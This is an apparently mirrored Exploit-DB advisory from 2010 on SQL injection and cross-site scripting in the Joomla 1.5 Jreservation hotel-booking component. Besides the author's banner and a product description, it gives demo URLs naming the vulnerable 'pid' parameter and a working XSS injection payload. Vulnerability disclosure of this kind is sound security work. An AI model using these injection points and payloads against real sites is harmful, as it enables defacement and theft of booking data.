Joomla! Component Jreservation 1.5 – SQL Injection / Cross-Site Scripting

• Exploit Database
• 105 阅读

• 作者： Sid3^effects
  日期： 2010-06-09
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/13794/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67

  ============================================================ Joomla 1.5 Jreservation Component SQLi And XSS Vulnerability ============================================================ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /&apos; \__/&apos;__<code>\/\ \__/&apos;__</code>\ 0 0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1 1\/_/\ \ /&apos; _ <code>\ \/\ \/_/_\_<_/&apos;___\ \ \/\ \ \ \ \/</code>&apos;__\0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1 1\ \____/ >> Exploit database separated by exploit 0 0 \/___/type (local, remote, DoS, etc.)1 11 0[+] Site: Inj3ct0r.com0 1[+] Support e-mail: submit[at]inj3ct0r.com1 00 1 ########################################## 1 0 I&apos;m Sid3^effects member from Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1   Name : Joomla 1.5 Jreservation Component SQLi And XSS Vulnerability Date : june, 9 2010 Vendor url :http://jforjoomla.com/ Platform: Windows Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com> special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_ greetz to :All ICW members.   ############################################################################################################### Description:   Joomla 1.5 Jreservation Component for hotel booking system. Jreservation is a specially designed component for hotel owners who provides lodging facility & online booking for the rooms like deluxe, Air conditioned, Non Air conditioned. By using this Joomla 1.5 Jreservation component you can add multiple room types, amenity types like room amenity or property amenity. Amenity are like additional services which the hotel owner provides with the room e.g. Telephone, internet connection, cable connection and property amenity like swimming pool, gym, etc. With the help of a calender the user or a customer of the hotel can check rooms availability also book room as a provisional booking.   Features of Joomla 1.5 Jreservation component :- 1.Native Joomla 1.5 2.Multiple properties are supported. 2.Admin can add / edit rooms/ room types 3 Admin can add / edit rooms/ rooms. 4.Admin can add / edit room amenities/ Property amenities. 5.Detailed search for user to search for available rooms. 4.Hotel owner can show hotel images in a slideshow. 5.Owner can upload multiple images to the admin. 6.Owner can add multiple rooms,room type, room rent in an easy way.   ###############################################################################################################   Xploit: SQLi Vulnerability   DEMOURL:   http://site.com/cd-hotel/Property-Cpanel.html?pid=[SQLi]   ###############################################################################################################   Xploit: XSS Vulnerability   DEMO URL :   http://site.com/cd-hotel/Property-Cpanel.html?pid=">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>   ############################################################################################################### # 0day no more # Sid3^effects